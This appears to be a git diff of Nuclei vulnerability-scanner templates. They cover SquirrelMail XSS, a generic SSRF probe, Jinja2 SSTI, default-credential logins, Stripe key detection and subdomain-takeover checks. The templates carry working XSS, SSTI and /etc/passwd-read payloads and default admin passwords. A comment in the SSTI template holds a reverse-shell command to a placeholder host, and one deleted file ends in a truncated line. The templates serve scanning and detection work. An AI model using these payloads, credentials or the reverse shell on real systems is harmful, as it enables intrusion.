SquirrelMail Address Add Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - reference: https://www.exploit-db.com/exploits/26305 - tags: xss,squirrelmail,plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "" - - - type: word - part: header - words: - - "text/html" diff --git a/nuclei-templates/Other/squirrelmail-add-xss.yaml b/nuclei-templates/Other/squirrelmail-add-xss.yaml new file mode 100644 index 0000000000..07eada2ee1 --- /dev/null +++ b/nuclei-templates/Other/squirrelmail-add-xss.yaml @@ -0,0 +1,25 @@ +id: squirrelmail-address-xss +info: + name: SquirrelMail 1.4.2 Address Add Plugin - 'add.php' Cross-Site Scripting + author: dhiyaneshDk + severity: medium + description: SquirrelMail Address Add Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + reference: https://www.exploit-db.com/exploits/26305 + tags: xss,squirrelmail,plugin +requests: + - method: GET + path: + - '{{BaseURL}}/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - "" + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/Other/squirrelmail-login-10519.yaml b/nuclei-templates/Other/squirrelmail-login-10519.yaml index cf41a9f435..d618b567ac 100644 --- a/nuclei-templates/Other/squirrelmail-login-10519.yaml +++ b/nuclei-templates/Other/squirrelmail-login-10519.yaml @@ -1,26 +1,23 @@ id: squirrelmail-login - info: name: SquirrelMail - Login author: dhiyaneshDk severity: info - reference: https://www.exploit-db.com/ghdb/7407 + reference: + - https://www.exploit-db.com/ghdb/7407 metadata: - shodan-query: 'http.title:"SquirrelMail - Login"' + shodan-query: http.title:"SquirrelMail - Login" tags: panel,squirrelmail - requests: - method: GET path: - "{{BaseURL}}/src/login.php" - matchers-condition: and matchers: - type: word part: body words: - "SquirrelMail - Login" - - type: status status: - 200 diff --git a/nuclei-templates/Other/squirrelmail-vkeyboard-xss-10522.yaml b/nuclei-templates/Other/squirrelmail-vkeyboard-xss-10522.yaml deleted file mode 100644 index a0daf19e46..0000000000 --- a/nuclei-templates/Other/squirrelmail-vkeyboard-xss-10522.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: squirrelmail-vkeyboard-xss - -info: - name: SquirrelMail Virtual Keyboard Plugin - 'vkeyboard.php' Cross-Site Scripting - author: dhiyaneshDk - severity: medium - description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - reference: https://www.exploit-db.com/exploits/34814 - tags: xss,squirrelmail,plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/nuclei-templates/Other/squirrelmail-vkeyboard-xss.yaml b/nuclei-templates/Other/squirrelmail-vkeyboard-xss.yaml new file mode 100644 index 0000000000..1dd8677274 --- /dev/null +++ b/nuclei-templates/Other/squirrelmail-vkeyboard-xss.yaml @@ -0,0 +1,25 @@ +id: squirrelmail-vkeyboard-xss +info: + name: SquirrelMail Virtual Keyboard Plugin - 'vkeyboard.php' Cross-Site Scripting + author: dhiyaneshDk + severity: medium + description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + reference: https://www.exploit-db.com/exploits/34814 + tags: xss,squirrelmail,plugin +requests: + - method: GET + path: + - '{{BaseURL}}/plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "" + part: body + - type: word + words: + - "text/html" + part: header diff --git a/nuclei-templates/Other/ssrf-detection.yaml b/nuclei-templates/Other/ssrf-detection.yaml new file mode 100644 index 0000000000..6276c76b83 --- /dev/null +++ b/nuclei-templates/Other/ssrf-detection.yaml @@ -0,0 +1,21 @@ +id: generic-ssrf + +info: + name: generic-ssrf + author: nagli + severity: high + reference: ssrf + tags: ssrf + +requests: + - method: GET + path: + - '{{BaseURL}}http://{{interactsh-url}}' + - '{{BaseURL}}test&access={{interactsh-url}}&remote_url={{interactsh-url}}&admin={{interactsh-url}}&dbg={{interactsh-url}}&debug={{interactsh-url}}&edit={{interactsh-url}}&grant={{interactsh-url}}&test={{interactsh-url}}&alter={{interactsh-url}}&clone={{interactsh-url}}&create={{interactsh-url}}&delete={{interactsh-url}}&disable={{interactsh-url}}&enable={{interactsh-url}}&exec={{interactsh-url}}&execute={{interactsh-url}}&load={{interactsh-url}}&make={{interactsh-url}}&modify={{interactsh-url}}&rename={{interactsh-url}}&reset={{interactsh-url}}&shell={{interactsh-url}}&toggle={{interactsh-url}}&adm={{interactsh-url}}&root={{interactsh-url}}&cfg={{interactsh-url}}&dest={{interactsh-url}}&redirect={{interactsh-url}}&uri={{interactsh-url}}&path={{interactsh-url}}&continue={{interactsh-url}}&url={{interactsh-url}}&window={{interactsh-url}}&next={{interactsh-url}}&data={{interactsh-url}}&reference={{interactsh-url}}&site={{interactsh-url}}&html={{interactsh-url}}&val={{interactsh-url}}&validate={{interactsh-url}}&domain={{interactsh-url}}&callback={{interactsh-url}}&return={{interactsh-url}}&page={{interactsh-url}}&feed={{interactsh-url}}&host={{interactsh-url}}&port={{interactsh-url}}&to={{interactsh-url}}&out={{interactsh-url}}&view={{interactsh-url}}&dir={{interactsh-url}}&show={{interactsh-url}}&navigation={{interactsh-url}}&open={{interactsh-url}}&file={{interactsh-url}}&document={{interactsh-url}}&folder={{interactsh-url}}&pg={{interactsh-url}}&php_path={{interactsh-url}}&style={{interactsh-url}}&doc={{interactsh-url}}&img={{interactsh-url}}&filename={{interactsh-url}}' + + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "http" + - "dns" diff --git a/nuclei-templates/Other/ssrf-via-oauth-misconfig-10527.yaml b/nuclei-templates/Other/ssrf-via-oauth-misconfig.yaml similarity index 100% rename from nuclei-templates/Other/ssrf-via-oauth-misconfig-10527.yaml rename to nuclei-templates/Other/ssrf-via-oauth-misconfig.yaml diff --git a/nuclei-templates/Other/ssrf_nagli.yaml b/nuclei-templates/Other/ssrf_nagli.yaml deleted file mode 100644 index 605de026aa..0000000000 --- a/nuclei-templates/Other/ssrf_nagli.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: generic-ssrf - -info: - name: generic-ssrf - author: nagli - severity: high - reference: ssrf - tags: ssrf - -requests: - - method: GET - path: - - '{{BaseURL}}http://{{interactsh-url}}' - - '{{BaseURL}}test&access={{interactsh-url}}&remote_url={{interactsh-url}}&admin={{interactsh-url}}&dbg={{interactsh-url}}&debug={{interactsh-url}}&edit={{interactsh-url}}&grant={{interactsh-url}}&test={{interactsh-url}}&alter={{interactsh-url}}&clone={{interactsh-url}}&create={{interactsh-url}}&delete={{interactsh-url}}&disable={{interactsh-url}}&enable={{interactsh-url}}&exec={{interactsh-url}}&execute={{interactsh-url}}&load={{interactsh-url}}&make={{interactsh-url}}&modify={{interactsh-url}}&rename={{interactsh-url}}&reset={{interactsh-url}}&shell={{interactsh-url}}&toggle={{interactsh-url}}&adm={{interactsh-url}}&root={{interactsh-url}}&cfg={{interactsh-url}}&dest={{interactsh-url}}&redirect={{interactsh-url}}&uri={{interactsh-url}}&path={{interactsh-url}}&continue={{interactsh-url}}&url={{interactsh-url}}&window={{interactsh-url}}&next={{interactsh-url}}&data={{interactsh-url}}&reference={{interactsh-url}}&site={{interactsh-url}}&html={{interactsh-url}}&val={{interactsh-url}}&validate={{interactsh-url}}&domain={{interactsh-url}}&callback={{interactsh-url}}&return={{interactsh-url}}&page={{interactsh-url}}&feed={{interactsh-url}}&host={{interactsh-url}}&port={{interactsh-url}}&to={{interactsh-url}}&out={{interactsh-url}}&view={{interactsh-url}}&dir={{interactsh-url}}&show={{interactsh-url}}&navigation={{interactsh-url}}&open={{interactsh-url}}&file={{interactsh-url}}&document={{interactsh-url}}&folder={{interactsh-url}}&pg={{interactsh-url}}&php_path={{interactsh-url}}&style={{interactsh-url}}&doc={{interactsh-url}}&img={{interactsh-url}}&filename={{interactsh-url}}' - - matchers: - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "http" - - "dns" \ No newline at end of file diff --git a/nuclei-templates/Other/ssti.yaml b/nuclei-templates/Other/ssti.yaml new file mode 100644 index 0000000000..900bced766 --- /dev/null +++ b/nuclei-templates/Other/ssti.yaml @@ -0,0 +1,24 @@ +id: ssti + +# from_string function is prone to SSTI where it takes the "source" parameter as a template object and render it and then return it. +# Reading the /etc/passwd +# http://localhost/search/?u={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} +# Getting a reverse shell +# http://localhost/search?u={{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} + +info: + name: Jinja2 2.10 - Command injection from_string function + author: pikpikcu + severity: high + +requests: + - method: GET + path: + - "{{BaseURL}}{{100*285}}" + - "{{BaseURL}}{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}" + matchers: + - type: regex + regex: + - "28500" + - "root:x:0:0:root:" + part: body diff --git a/nuclei-templates/Other/stackstorm-default-login-10529.yaml b/nuclei-templates/Other/stackstorm-default-login-10529.yaml new file mode 100644 index 0000000000..24c51c9a10 --- /dev/null +++ b/nuclei-templates/Other/stackstorm-default-login-10529.yaml @@ -0,0 +1,41 @@ +id: stackstorm-default-login +info: + name: StackStorm Default Login + author: PaperPen + severity: high + description: A StackStorm default admin login was discovered. + reference: + - https://github.com/StackStorm/st2-docker + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + fofa-query: app="stackstorm" + tags: stackstorm,default-login +requests: + - raw: + - | + POST /auth/tokens HTTP/1.1 + Host: {{BaseURL}} + Content-Type: application/json + Authorization: Basic {{base64(username + ':' + password)}} + attack: pitchfork + payloads: + username: + - st2admin + password: + - Ch@ngeMe + matchers-condition: and + matchers: + - type: word + words: + - '"user":' + - '"token":' + - '"expiry":' + condition: and + - type: status + status: + - 201 + +# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/stackstorm-default-login-10530.yaml b/nuclei-templates/Other/stackstorm-default-login-10530.yaml deleted file mode 100644 index 63d943d46a..0000000000 --- a/nuclei-templates/Other/stackstorm-default-login-10530.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: stackstorm-default-login -info: - name: StackStorm Default Login - author: PaperPen - severity: high - description: A StackStorm default admin login was discovered. - metadata: - fofa-query: app="stackstorm" - reference: - - https://github.com/StackStorm/st2-docker - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: stackstorm,default-login -requests: - - raw: - - | - POST /auth/tokens HTTP/1.1 - Host: {{BaseURL}} - Content-Type: application/json - Authorization: Basic {{base64(username + ':' + password)}} - attack: pitchfork - payloads: - username: - - st2admin - password: - - Ch@ngeMe - matchers-condition: and - matchers: - - type: word - words: - - '"user":' - - '"token":' - - '"expiry":' - condition: and - - type: status - status: - - 201 - -# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/stem-audio-table-private-keys-10536.yaml b/nuclei-templates/Other/stem-audio-table-private-keys-10536.yaml deleted file mode 100644 index 22c6eec3cc..0000000000 --- a/nuclei-templates/Other/stem-audio-table-private-keys-10536.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: stem-audio-table-private-keys -info: - name: Detect Private Key on STEM Audio Table - author: gy741 - severity: high - reference: - - https://blog.grimm-co.com/2021/06/the-walls-have-ears.html - tags: stem,config,exposure,iot -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/privatekey.pem" - matchers-condition: and - matchers: - - type: word - words: - - "BEGIN RSA PRIVATE KEY" - - type: status - status: - - 200 - - type: dsl - dsl: - - '!contains(tolower(body), "Strapi Admin' diff --git a/nuclei-templates/Other/strapi-page.yaml b/nuclei-templates/Other/strapi-page.yaml index abec659651..133c9a43ba 100644 --- a/nuclei-templates/Other/strapi-page.yaml +++ b/nuclei-templates/Other/strapi-page.yaml @@ -1,14 +1,17 @@ id: strapi-page + info: name: Strapi Page author: dhiyaneshDk severity: info reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+your+Strapi+app%22 tags: api,strapi + requests: - method: GET path: - '{{BaseURL}}' + matchers: - type: word words: diff --git a/nuclei-templates/Other/strapi.yaml b/nuclei-templates/Other/strapi.yaml new file mode 100644 index 0000000000..24ad16d2a5 --- /dev/null +++ b/nuclei-templates/Other/strapi.yaml @@ -0,0 +1,23 @@ +id: strapi +info: + name: strapi + author: cn-kali-team + tags: detect,tech,strapi + severity: info + metadata: + fofa-query: + - app="strapi-headless-cms" + product: strapi + shodan-query: + - html:"welcome to your strapi app" + vendor: strapi + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - welcome to your strapi app + case-insensitive: true diff --git a/nuclei-templates/Other/2904374066.yaml b/nuclei-templates/Other/stratum.yaml similarity index 100% rename from nuclei-templates/Other/2904374066.yaml rename to nuclei-templates/Other/stratum.yaml diff --git a/nuclei-templates/Other/strikingly-takeover-10551.yaml b/nuclei-templates/Other/strikingly-takeover-10551.yaml index 23694e44a8..99b38866c1 100644 --- a/nuclei-templates/Other/strikingly-takeover-10551.yaml +++ b/nuclei-templates/Other/strikingly-takeover-10551.yaml @@ -3,9 +3,8 @@ info: name: strikingly takeover detection author: pdteam severity: high - reference: - - https://medium.com/@sherif0x00/takeover-subdomains-pointing-to-strikingly-5e67df80cdfd tags: takeover + reference: https://medium.com/@sherif0x00/takeover-subdomains-pointing-to-strikingly-5e67df80cdfd requests: - method: GET path: diff --git a/nuclei-templates/Other/stripe-api-key-11869.yaml b/nuclei-templates/Other/stripe-api-key-11869.yaml new file mode 100644 index 0000000000..d65411c71f --- /dev/null +++ b/nuclei-templates/Other/stripe-api-key-11869.yaml @@ -0,0 +1,16 @@ +id: stripe-api-key + +info: + name: Stripe API Key + author: gaurang + severity: high + tags: token,file,stripe + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}" diff --git a/nuclei-templates/Other/stripe-api-key.yaml b/nuclei-templates/Other/stripe-api-key.yaml deleted file mode 100644 index 5624af050d..0000000000 --- a/nuclei-templates/Other/stripe-api-key.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: stripe-api-key -info: - name: Stripe API Key - author: gaurang - severity: high - tags: token,file,stripe -file: - - extensions: - - all - extractors: - - type: regex - regex: - - "(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}" diff --git a/nuclei-templates/Other/stripe-restricted-key-10555.yaml b/nuclei-templates/Other/stripe-restricted-key-10555.yaml deleted file mode 100755 index cdf368d652..0000000000 --- a/nuclei-templates/Other/stripe-restricted-key-10555.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: stripe-restricted-key - -info: - name: Stripe Restricted Key Disclosure - author: Ice3man - severity: info - tags: exposure,token,stripe - -requests: - - method: GET - path: - - "{{BaseURL}}" - extractors: - - type: regex - part: body - regex: - - 'rk_(?:live|test)_[0-9a-zA-Z]{24}' diff --git a/nuclei-templates/Other/stripe-restricted-key.yaml b/nuclei-templates/Other/stripe-restricted-key.yaml new file mode 100644 index 0000000000..4896123a98 --- /dev/null +++ b/nuclei-templates/Other/stripe-restricted-key.yaml @@ -0,0 +1,15 @@ +id: stripe-restricted-key +info: + name: Stripe Restricted Key Disclosure + author: Ice3man + severity: info + tags: exposure,token,stripe +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'rk_(?:live|test)_[0-9a-zA-Z]{24}' diff --git a/nuclei-templates/Other/stripe-secret-key-10556.yaml b/nuclei-templates/Other/stripe-secret-key-10556.yaml deleted file mode 100755 index e2e7d6de26..0000000000 --- a/nuclei-templates/Other/stripe-secret-key-10556.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: stripe-secret-key - -info: - name: Stripe Secret Key Disclosure - author: Ice3man - severity: info - tags: exposure,token,stripe - -requests: - - method: GET - path: - - "{{BaseURL}}" - extractors: - - type: regex - part: body - regex: - - 'sk_(?:live|test)_[0-9a-zA-Z]{24}' diff --git a/nuclei-templates/Other/stripe-secret-key-10558.yaml b/nuclei-templates/Other/stripe-secret-key-10558.yaml new file mode 100644 index 0000000000..9816781d10 --- /dev/null +++ b/nuclei-templates/Other/stripe-secret-key-10558.yaml @@ -0,0 +1,15 @@ +id: stripe-secret-key +info: + name: Stripe Secret Key Disclosure + author: Ice3man + severity: info + tags: exposure,token +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'sk_(?:live|test)_[0-9a-zA-Z]{24}' diff --git a/nuclei-templates/Other/struts-debug-mode-10561.yaml b/nuclei-templates/Other/struts-debug-mode-10561.yaml index 8abc5f4364..ade1eefb66 100644 --- a/nuclei-templates/Other/struts-debug-mode-10561.yaml +++ b/nuclei-templates/Other/struts-debug-mode-10561.yaml @@ -1,16 +1,13 @@ id: struts-debug-mode - info: name: Apache Struts setup in Debug-Mode author: pdteam severity: low tags: logs,struts,apache,exposure,setup - requests: - method: GET path: - '{{BaseURL}}' - matchers: - type: word words: diff --git a/nuclei-templates/Other/struts-problem-report-10563.yaml b/nuclei-templates/Other/struts-problem-report-10564.yaml similarity index 100% rename from nuclei-templates/Other/struts-problem-report-10563.yaml rename to nuclei-templates/Other/struts-problem-report-10564.yaml diff --git a/nuclei-templates/Other/subdomain-takeover-dns-10566.yaml b/nuclei-templates/Other/subdomain-takeover-dns-10566.yaml deleted file mode 100644 index 4fa1a3d60c..0000000000 --- a/nuclei-templates/Other/subdomain-takeover-dns-10566.yaml +++ /dev/null @@ -1,52 +0,0 @@ -id: subdomain-takeover-dns - -info: - name: Subdomain Takover detection using DNS - author: "glatisant" - severity: medium - -dns: - - name: "{{FQDN}}" - type: A - class: inet - recursion: true - retries: 2 - matchers-condition: and - matchers: - - type: word - words: - - "azure-api.net" - - "azure-mobile.net" - - "azure-dns.org" - - "azure-dns.net" - - "azure-dns.com" - - "azure-dns.info" - - "azurecontainer.io" - - "azurecr.io" - - "azuredatalakestore.net" - - "azureedge.net" - - "azurefd.net" - - "azurehdinsight.net" - - "azurewebsites.net" - - "azurewebsites.windows.net" - - "blob.core.windows.net" - - "cloudapp.azure.com" - - "cloudapp.net" - - "database.windows.net" - - "redis.cache.windows.net" - - "search.windows.net" - - "servicebus.windows.net" - - "trafficmanager.net" - - "visualstudio.com" - - "zendesk.com" - - "mailgun.org" - - "hosted-by-discourse.com" - - "icn.bg" - - "netlify.com" - - "netlify.app" - - "104.198.14.52" - - type: word - words: - - "NXDOMAIN" - - "SERVFAIL" - - "REFUSED" \ No newline at end of file diff --git a/nuclei-templates/Other/subdomain-takeover-dns-wildcards-10565.yaml b/nuclei-templates/Other/subdomain-takeover-dns-wildcards-10565.yaml new file mode 100644 index 0000000000..02c33729be --- /dev/null +++ b/nuclei-templates/Other/subdomain-takeover-dns-wildcards-10565.yaml @@ -0,0 +1,25 @@ +id: subdomain-takeover-dns-wildcards + +info: + name: Subdomain Takover detection using Wildcards + author: "glatisant" + severity: medium + +dns: + - name: "{{FQDN}}" + type: A + class: inet + recursion: true + retries: 3 + matchers-condition: and + matchers: + - type: word + words: + - "IN\tCNAME" + - "IN\tA" + - "IN\tMX" + - type: word + words: + - "NXDOMAIN" + - "SERVFAIL" + - "REFUSED" \ No newline at end of file diff --git a/nuclei-templates/Other/subdomain-takeover-dns-wildcards.yaml b/nuclei-templates/Other/subdomain-takeover-dns-wildcards.yaml deleted file mode 100644 index a65bc05a41..0000000000 --- a/nuclei-templates/Other/subdomain-takeover-dns-wildcards.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: subdomain-takeover-dns-wildcards -info: - name: Subdomain Takover detection using Wildcards - author: "glatisant" - severity: medium -dns: - - name: "{{FQDN}}" - type: A - class: inet - recursion: true - retries: 3 - matchers-condition: and - matchers: - - type: word - words: - - "IN\tCNAME" - - "IN\tA" - - "IN\tMX" - - type: word - words: - - "NXDOMAIN" - - "SERVFAIL" - - "REFUSED" diff --git a/nuclei-templates/Other/subdomain-takeover-dns.yaml b/nuclei-templates/Other/subdomain-takeover-dns.yaml new file mode 100644 index 0000000000..bc57ee31ab --- /dev/null +++ b/nuclei-templates/Other/subdomain-takeover-dns.yaml @@ -0,0 +1,50 @@ +id: subdomain-takeover-dns +info: + name: Subdomain Takover detection using DNS + author: "glatisant" + severity: medium +dns: + - name: "{{FQDN}}" + type: A + class: inet + recursion: true + retries: 2 + matchers-condition: and + matchers: + - type: word + words: + - "azure-api.net" + - "azure-mobile.net" + - "azure-dns.org" + - "azure-dns.net" + - "azure-dns.com" + - "azure-dns.info" + - "azurecontainer.io" + - "azurecr.io" + - "azuredatalakestore.net" + - "azureedge.net" + - "azurefd.net" + - "azurehdinsight.net" + - "azurewebsites.net" + - "azurewebsites.windows.net" + - "blob.core.windows.net" + - "cloudapp.azure.com" + - "cloudapp.net" + - "database.windows.net" + - "redis.cache.windows.net" + - "search.windows.net" + - "servicebus.windows.net" + - "trafficmanager.net" + - "visualstudio.com" + - "zendesk.com" + - "mailgun.org" + - "hosted-by-discourse.com" + - "icn.bg" + - "netlify.com" + - "netlify.app" + - "104.198.14.52" + - type: word + words: + - "NXDOMAIN" + - "SERVFAIL" + - "REFUSED" diff --git a/nuclei-templates/Other/detect-all-takeovers.yaml b/nuclei-templates/Other/subdomain-takeover.yaml similarity index 100% rename from nuclei-templates/Other/detect-all-takeovers.yaml rename to nuclei-templates/Other/subdomain-takeover.yaml diff --git a/nuclei-templates/Other/submitty-login.yaml b/nuclei-templates/Other/submitty-login-10568.yaml similarity index 100% rename from nuclei-templates/Other/submitty-login.yaml rename to nuclei-templates/Other/submitty-login-10568.yaml diff --git a/nuclei-templates/Other/sugarcrm-panel-10570.yaml b/nuclei-templates/Other/sugarcrm-panel-10570.yaml new file mode 100644 index 0000000000..c76645fdf8 --- /dev/null +++ b/nuclei-templates/Other/sugarcrm-panel-10570.yaml @@ -0,0 +1,27 @@ +id: sugarcrm-panel + +info: + name: Detect SugarCRM Panel + author: johnk3r + severity: info + metadata: + shodan-query: http.title:sugarcrm + tags: sugarcrm,panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/index.php?action=Login&module=Users" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "SugarCRM" + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/sugarcrm-panel-10571.yaml b/nuclei-templates/Other/sugarcrm-panel-10571.yaml deleted file mode 100644 index 21faa453bf..0000000000 --- a/nuclei-templates/Other/sugarcrm-panel-10571.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: sugarcrm-panel -info: - name: Detect SugarCRM Panel - author: johnk3r - severity: info - reference: - - https://www.shodan.io/search?query=sugarcrm - tags: sugarcrm,panel -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/index.php?action=Login&module=Users" - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "SugarCRM" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/supermicro-default-login-10572.yaml b/nuclei-templates/Other/supermicro-default-login-10572.yaml new file mode 100644 index 0000000000..389184e33a --- /dev/null +++ b/nuclei-templates/Other/supermicro-default-login-10572.yaml @@ -0,0 +1,46 @@ +id: supermicro-default-login + +info: + name: Supermicro Ipmi - Default Admin Login + author: For3stCo1d + severity: high + description: Supermicro Ipmi default admin login credentials were successful. + reference: + - https://www.gearprimer.com/wiki/supermicro-ipmi-default-username-pasword/ + metadata: + max-request: 2 + tags: supermicro,default-login + +http: + - raw: + - | + POST /cgi/login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + name={{user}}&pwd={{pass}} + + attack: pitchfork + payloads: + user: + - ADMIN + - admin + pass: + - ADMIN + - admin + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'self.location=' + - '/cgi/url_redirect.cgi?url_name=mainmenu' + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a004730450220774c665ddbbaf12c515be67dc37f276fed0e1d410d0820b8ccd1b3523dae5cac022100f06abda25027143ab8bb06bae13c9e5c9d68b91bfbcfd21f9768cea90746fa9d:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/supermicro-default-login.yaml b/nuclei-templates/Other/supermicro-default-login.yaml deleted file mode 100644 index 9caa2a311e..0000000000 --- a/nuclei-templates/Other/supermicro-default-login.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: supermicro-default-login -info: - name: Supermicro Ipmi Default Login - author: For3stCo1d - severity: high - reference: - - https://www.gearprimer.com/wiki/supermicro-ipmi-default-username-pasword/ - tags: supermicro,default-login -requests: - - raw: - - | - POST /cgi/login.cgi HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - name={{user}}&pwd={{pass}} - attack: pitchfork - payloads: - user: - - ADMIN - - admin - pass: - - ADMIN - - admin - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'self.location=' - - '/cgi/url_redirect.cgi?url_name=mainmenu' - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/superset-default-login-10573.yaml b/nuclei-templates/Other/superset-default-login-10573.yaml deleted file mode 100644 index aca3520299..0000000000 --- a/nuclei-templates/Other/superset-default-login-10573.yaml +++ /dev/null @@ -1,59 +0,0 @@ -id: apache-superset-default-login - -info: - name: Apache Superset Default Login - author: dhiyaneshDK - severity: high - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json - tags: apache, default-login - -requests: - - raw: - - | - GET /login/ HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - - | - POST /login/ HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/admin/airflow/login - - csrf_token={{csrf_token}}&username={{username}}&password={{password}} - - attack: pitchfork - payloads: - username: - - admin - password: - - admin - - extractors: - - type: regex - name: csrf_token - group: 1 - part: body - internal: true - regex: - - 'value="(.*?)">' - - matchers-condition: and - matchers: - - type: word - part: body - condition: and - words: - - 'Redirecting...' - - '

    Redirecting...' - - - type: word - part: header - words: - - 'session' - - - type: status - status: - - 302 diff --git a/nuclei-templates/Other/superset-default-login-10574.yaml b/nuclei-templates/Other/superset-default-login-10574.yaml new file mode 100644 index 0000000000..71a197e9fd --- /dev/null +++ b/nuclei-templates/Other/superset-default-login-10574.yaml @@ -0,0 +1,59 @@ +id: CVE-2021-44451 +info: + name: Apache Superset Default Login + author: dhiyaneshDK + severity: high + description: Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way. + remediation: Users should upgrade to Apache Superset 1.4.0 or higher. + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json + - https://nvd.nist.gov/vuln/detail/CVE-2021-44451 + tags: apache, default-login + classification: + cve-id: CVE-2021-44451 +requests: + - raw: + - | + GET /login/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + - | + POST /login/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/admin/airflow/login + + csrf_token={{csrf_token}}&username={{username}}&password={{password}} + attack: pitchfork + payloads: + username: + - admin + password: + - admin + extractors: + - type: regex + name: csrf_token + group: 1 + part: body + internal: true + regex: + - 'value="(.*?)">' + matchers-condition: and + matchers: + - type: word + part: body + condition: and + words: + - 'Redirecting...' + - '

    Redirecting...' + - type: word + part: header + words: + - 'session' + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/02 diff --git a/nuclei-templates/Other/superset-default-login.yaml b/nuclei-templates/Other/superset-default-login.yaml new file mode 100644 index 0000000000..ba5c16e792 --- /dev/null +++ b/nuclei-templates/Other/superset-default-login.yaml @@ -0,0 +1,51 @@ +id: apache-superset-default-login +info: + name: Apache Superset Default Login + author: dhiyaneshDK + severity: high + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json + tags: apache, default-login +requests: + - raw: + - | + GET /login/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + - | + POST /login/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/admin/airflow/login + + csrf_token={{csrf_token}}&username={{username}}&password={{password}} + attack: pitchfork + payloads: + username: + - admin + password: + - admin + extractors: + - type: regex + name: csrf_token + group: 1 + part: body + internal: true + regex: + - 'value="(.*?)">' + matchers-condition: and + matchers: + - type: word + part: body + condition: and + words: + - 'Redirecting...' + - '

